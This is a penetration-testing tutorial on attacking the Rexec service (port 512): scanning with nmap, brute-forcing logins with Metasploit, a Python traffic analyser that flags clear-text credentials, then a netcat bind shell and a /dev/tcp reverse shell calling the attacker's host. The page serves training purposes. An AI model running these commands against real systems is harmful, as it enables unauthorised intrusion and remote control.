# Rexec - Port 512

{% tabs %}
{% tab title="Support VeryLazyTech 🎉" %}
Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁**

* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
  * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
  * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
  * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses. 📚
{% endtab %}
{% endtabs %}

## Basic Info <a href="#basic-information" id="basic-information"></a>

Rexec (remote execution) is a service that **allows you to execute a command on a remote host** if you know valid **credentials** (username and password).

**Default Port:** 512

```
PORT    STATE SERVICE
512/tcp open  exec
```

## Scanning for Hosts

Start by using Nmap to scan for hosts with port 512 open, which is the default port for Rexec:

```
nmap -sT -p 512 <target_ip_range>
```

This will help identify potential targets with the Rexec service running.

## Brute-Forcing Credentials

Use Metasploit's `auxiliary/scanner/rservices/rexec_login` module to brute-force username and password combinations:

Load the module:

```
use auxiliary/scanner/rservices/rexec_login
```

Set the target and options, such as username and password files:

```
set RHOSTS <target_ip>
set USER_FILE /path/to/usernames.txt
set PASS_FILE /path/to/passwords.txt
run
```

This tries each username/password combination from the two files and reports any valid pair; Rexec accepts the password in clear text, which is the weakness the module relies on.
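To see what the Basic Info and brute-force sections mean on the wire, here is an added example (not code from the original page or from Metasploit): a small analyser for captured port-512 traffic. It assumes the BSD rexec(3)/rexecd request format, `<stderr_port>\0<user>\0<password>\0<command>\0`, and the server reply of a single NUL byte on success or `\x01` followed by an error line on failure. The capture below is constructed; `analyse_capture` and `max_failures` are names chosen for this example.

```python
# Added example: parse rexec requests and flag clear-text credentials and
# repeated login failures in captured port-512 traffic.
# Wire format assumed from the BSD rexec(3)/rexecd protocol:
#   client -> server: "<stderr_port>\0<user>\0<password>\0<command>\0"
#   server -> client: b"\x00" on success, or b"\x01" + error text on failure
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

REXEC_PORT = 512


@dataclass
class RexecRequest:
    stderr_port: int
    user: str
    password: str
    command: str


def parse_rexec_request(payload: bytes) -> Optional[RexecRequest]:
    """Split a client payload into its four NUL-terminated fields.
    Returns None when the bytes do not look like a rexec request."""
    parts = payload.split(b"\x00")
    # Four terminated fields give at least five pieces (the last is empty).
    if len(parts) < 5:
        return None
    port_s, user, password, command = parts[:4]
    if not port_s.isdigit() or not user:
        return None
    stderr_port = int(port_s)          # "0" means no separate stderr socket
    if stderr_port > 65535:
        return None
    return RexecRequest(stderr_port, user.decode("latin-1"),
                        password.decode("latin-1"), command.decode("latin-1"))


def parse_rexec_response(payload: bytes) -> Optional[bool]:
    """True for a success reply (NUL), False for a failure (\x01 ...), else None."""
    if not payload:
        return None
    if payload[0] == 0:
        return True
    if payload[0] == 1:
        return False
    return None


Packet = Tuple[str, str, int, int, bytes]   # (src_ip, dst_ip, sport, dport, data)


def analyse_capture(packets: List[Packet], max_failures: int = 3) -> Dict:
    """Walk one-direction packets in order. Every parsed request exposes the
    credentials in clear text; failed replies are counted per client and any
    client reaching max_failures is reported as a likely brute-force source."""
    credentials = []                 # (client, user, password, command)
    failures: Counter = Counter()
    successes: Counter = Counter()
    pending: Dict[str, RexecRequest] = {}   # client -> request awaiting a reply
    for src, dst, sport, dport, data in packets:
        if dport == REXEC_PORT:
            req = parse_rexec_request(data)
            if req is not None:
                credentials.append((src, req.user, req.password, req.command))
                pending[src] = req
        elif sport == REXEC_PORT:
            ok = parse_rexec_response(data)
            if ok is None or dst not in pending:
                continue
            (successes if ok else failures)[dst] += 1
            pending.pop(dst)
    flagged = sorted(c for c, n in failures.items() if n >= max_failures)
    return {"credentials": credentials, "failures": dict(failures),
            "successes": dict(successes), "brute_force_clients": flagged}


# Constructed capture: one client guessing alice's password, one legitimate
# session, and one non-rexec payload that must be ignored.
SAMPLE_PACKETS: List[Packet] = [
    ("10.0.0.5", "10.0.0.9", 40001, 512, b"0\x00alice\x00wrong1\x00id\x00"),
    ("10.0.0.9", "10.0.0.5", 512, 40001, b"\x01Login incorrect.\n"),
    ("10.0.0.5", "10.0.0.9", 40002, 512, b"0\x00alice\x00wrong2\x00id\x00"),
    ("10.0.0.9", "10.0.0.5", 512, 40002, b"\x01Login incorrect.\n"),
    ("10.0.0.5", "10.0.0.9", 40003, 512, b"0\x00alice\x00wrong3\x00id\x00"),
    ("10.0.0.9", "10.0.0.5", 512, 40003, b"\x01Login incorrect.\n"),
    ("10.0.0.5", "10.0.0.9", 40004, 512, b"0\x00alice\x00hunter2\x00id\x00"),
    ("10.0.0.9", "10.0.0.5", 512, 40004, b"\x00"),
    ("10.0.0.7", "10.0.0.9", 50001, 512, b"1023\x00bob\x00s3cret\x00uptime\x00"),
    ("10.0.0.9", "10.0.0.7", 512, 50001, b"\x00"),
    ("10.0.0.7", "10.0.0.9", 50002, 512, b"GET / HTTP/1.0\r\n\r\n"),
]

if __name__ == "__main__":
    report = analyse_capture(SAMPLE_PACKETS)
    for client, user, password, command in report["credentials"]:
        print(f"clear-text credentials from {client}: {user}:{password} -> {command!r}")
    print("failed logins:", report["failures"])
    print("brute-force sources:", report["brute_force_clients"])
```

Every request that parses yields the password verbatim, which is why the service is a credential-exposure risk even when nobody is guessing; the failure counter is the piece a sensor on port 512 would use to raise an alert on the brute-force module's activity.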

## Exploiting with Command Execution

Once you have valid credentials, use the `rexec` command to run a command on the host that opens a backdoor. For example, start a netcat listener on the target that hands a shell to whoever connects:

```
rexec -l username -p password rhost "nc -l -p 1234 -e /bin/bash"
```

Then connect to the backdoor from your machine (the listener runs on the target, so this is a client connection, not a second listener):

```
nc -nv rhost 1234
```

Alternatively, set up a reverse shell that calls back to a listener on your machine (started beforehand with `nc -lnvp <your_port>`):

```
rexec -l username -p password rhost "bash -c 'bash -i >& /dev/tcp/<your_ip>/<your_port> 0>&1'"
```

***

{% hint style="success" %}
Learn & practice [**For the OSCP.**](https://shop.verylazytech.com/)
{% endhint %}